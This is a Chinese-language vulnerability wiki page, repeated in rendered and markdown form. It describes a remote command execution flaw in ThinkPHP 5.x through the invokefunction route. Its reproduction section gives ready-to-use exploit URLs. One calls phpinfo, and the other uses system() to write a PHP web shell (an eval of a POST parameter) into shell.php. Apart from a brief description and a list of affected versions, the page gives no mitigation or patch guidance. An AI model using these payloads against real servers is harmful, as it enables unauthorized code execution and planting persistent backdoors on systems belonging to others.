fofamini-wiki

登录白背景

源码

thinkphp 5.x版本app/invokefunction存在命令执行漏洞

一、漏洞简介

ThinkPHP，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。thinkphp 5.x版本存在命令执行漏洞

二、影响版本

ThinkPHP 5.x

三、资产测绘

特征

四、漏洞复现

/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_POST[1]);?>%27%20>%20shell.php

原文: https://www.yuque.com/xiaokp7/ocvun2/sb9y0zghrt7vdct0

# thinkphp 5.x版本app/invokefunction存在命令执行漏洞

# 一、漏洞简介
ThinkPHP，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。thinkphp 5.x版本存在命令执行漏洞

# 二、影响版本
+ ThinkPHP 5.x

# 三、资产测绘
+ 特征

![1729964886744-cb4902d6-02ab-4c52-8adb-0342091d2594.png](./img/NxCzUH5N_JKql9_k/1729964886744-cb4902d6-02ab-4c52-8adb-0342091d2594-791176.png)

# 四、漏洞复现
```plain
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
```

![1729964861040-56d4b2fe-a9a5-498e-a0f6-58d05608fca5.png](./img/NxCzUH5N_JKql9_k/1729964861040-56d4b2fe-a9a5-498e-a0f6-58d05608fca5-344847.png)

```plain
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_POST[1]);?>%27%20>%20shell.php
```

![1729964782638-7cfd6d6f-2a4e-4699-bd56-e573947e8bef.png](./img/NxCzUH5N_JKql9_k/1729964782638-7cfd6d6f-2a4e-4699-bd56-e573947e8bef-510962.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sb9y0zghrt7vdct0>

fofamini-wiki

thinkphp 5.x版本app/invokefunction存在命令执行漏洞

一、漏洞简介

<font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>

三、资产测绘

四、漏洞复现